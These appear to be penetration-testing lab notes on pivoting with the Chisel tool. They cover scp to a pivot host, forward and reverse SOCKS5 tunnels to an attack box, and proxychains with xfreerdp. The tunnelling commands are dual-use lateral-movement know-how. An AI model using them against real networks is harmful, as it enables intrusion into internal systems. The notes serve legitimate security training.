- https://github.com/jpillora/chisel
- written in GO. uses HTTP to transport data, secured with SSH
Scenario - access internal host from attackbox by running Chisel on pivot
Workflow
- download chisel from github
go build
Copy chisel binary to the pivot
- scp chisel ubuntu@10.129.202.64:~/
Run chisel on pivot host
- ./chisel server -v -p 1234 --socks5
- Listen on port 1234
- Forward every request to all networks accessible from the pivot host
Connect to the Chisel server (pivot) from Pwnbox
- ./chisel client -v 10.129.202.64:1234 socks
- Returns the Listener port for the pwnbox
- If issues, use this chisel version - https://github.com/jpillora/chisel/releases/tag/v1.7.4
Modify proxychains
- Add the above listener port to /etc/proxychains.conf
Execute commands
- proxychains xfreerdp /u /v /p
Chisel Reverse Pivot
- The server has to specify
--reverse - The client has to specify
R:socks- for reversed - The server will listen and accept connections, and they will be proxied through the client
Workflow:
Chisel server on PWNBox
- sudo ./chisel server --reverse -v -p 1234 --socks5
Connecting the Chisel Client (pivot) to PWNbox
- ./chisel client -v 10.10.14.17:1234 R:socks
- Confirm
proxychainshas port number specified inclientresponse - Execute commands on the PWNBox with proxychains